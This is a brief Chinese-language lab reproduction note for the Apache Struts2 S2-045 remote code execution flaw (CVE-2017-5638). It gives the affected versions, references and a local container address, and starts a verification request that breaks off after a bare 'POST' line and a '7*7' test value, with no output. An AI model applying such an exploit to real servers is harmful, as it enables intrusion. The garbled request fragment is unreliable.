S2-045 远程代码执行漏洞(CVE-2017-5638)
受影响的版本:Struts 2.3.5 - Struts 2.3.31、Struts 2.5 - Struts 2.5.10
参考:
- http://struts.apache.org/docs/s2-045.html
- https://nsfocusglobal.com/apache-struts2-remote-code-execution-vulnerability-s2-045/
漏洞复现
容器运行后,访问http://192.168.44.132:8080
可以看到上传页面的示例。
通过以下请求验证漏洞:
1 | POST / HTTP/1.1 |
7*7
已成功执行: